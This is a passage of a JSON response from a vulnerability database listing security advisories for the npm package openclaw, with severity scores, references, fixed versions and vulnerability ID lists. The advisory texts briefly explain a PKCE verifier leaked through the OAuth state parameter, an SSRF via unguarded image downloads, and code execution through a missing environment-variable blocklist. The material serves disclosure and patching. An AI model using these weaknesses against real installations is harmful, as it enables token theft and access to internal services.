ing_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI
:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:46:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:46:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist"},{"reference_url":"https://github.com/advisories/GHSA-m866-6qv5-p2fg","reference_id":"GHSA-m866-6qv5-p2fg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m866-6qv5-p2fg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2
mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e
4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-v
ktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41332","GHSA-m866-6qv5-p2fg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bg1d-gmxy-wkc6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89289?format=json","vulnerability_id":"VCID-bgwh-spue-yybk","summary":
"OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter\n## Summary\n\nBefore OpenClaw 2026.4.2, the Gemini OAuth flow reused the PKCE verifier as the OAuth `state` value. Because the provider reflected `state` back in the redirect URL, the verifier could be exposed alongside the authorization code.\n\n## Impact\n\nAnyone who could capture the redirect URL could learn both the authorization code and the PKCE verifier, defeating PKCE's interception protection for that flow and enabling token redemption.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `a26f4d0f3ef0757db6c6c40277cc06a5de76c52f` — separate OAuth state from the PKCE verifier\n\nOpenClaw thanks @BG0ECV for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34511","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11185","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11219","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11226","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34511"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:
R/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34511","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34511"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","sc
oring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter"},{"reference_url":"https://github.com/advisories/GHSA-9jpj-g8vv-j5mf","reference_id":"GHSA-9jpj-g8vv-j5mf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9jpj-g8vv-j5mf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"V
CID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"V
CID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-34511","GHSA-9jpj-g8vv-j5mf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bgwh-spue-yybk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91210?format=json","vulnerability_id":"VCID-bk76-1ctt-tkaw","summary":"Duplicate Advisory: OpenClaw affected by SSRF via unguarded image download in fal provider\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qxgf-hmcj-3xw3. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a server-side request forgery vulnerability in the fal provider image-generation-provider.ts component that allows attackers to fetch internal URLs. 
A malicious or compromised fal relay can exploit unguarded image download fetches to expose internal service metadata and responses through the image pipeline.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34504","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_sys
tem":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34504"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider"},{"reference_url":"https://github.com/advisories/GHSA-35cq-wv6v-88xf","reference_id":"GHSA-35cq-wv6v-88xf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-35cq-wv6v-88xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3
zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h
